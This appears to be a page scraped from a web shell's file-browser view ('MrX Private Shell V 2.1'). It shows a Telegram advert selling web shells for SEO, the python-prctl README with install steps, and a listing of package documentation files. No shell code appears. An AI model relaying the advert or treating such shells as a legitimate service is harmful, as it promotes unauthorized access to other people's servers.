__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
python-prctl -- Control process attributes through prctl ======================================================== The linux prctl function allows you to control specific characteristics of a process' behaviour. Usage of the function is fairly messy though, due to limitations in C and linux. This module provides a nice non-messy python(ic) interface. Besides prctl, this library also wraps libcap for complete capability handling and allows you to set the process name as seen in ps and top. See docs/index.rst for the documentation. An HTML version can be found on http://packages.python.org/python-prctl/ Quick install instructions ========================== Before installing python-prctl, you need GCC, libc headers and libcap headers. On Debian/Ubuntu: $ sudo apt-get install build-essential libcap-dev On fedora: $ sudo yum install gcc glibc-devel libcap-devel Stable version: $ sudo easy_install python-prctl Latest code: $ git clone http://github.com/seveas/python-prctl $ cd python-prctl $ python setup.py build $ sudo python setup.py install
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| README | File | 1.04 KB | 0644 |
|
| changelog.Debian.arm64.gz | File | 220 B | 0644 |
|
| changelog.Debian.gz | File | 717 B | 0644 |
|
| copyright | File | 2.47 KB | 0644 |
|
| index.html | File | 112.58 KB | 0644 |
|
| index.rst.gz | File | 10.11 KB | 0644 |
|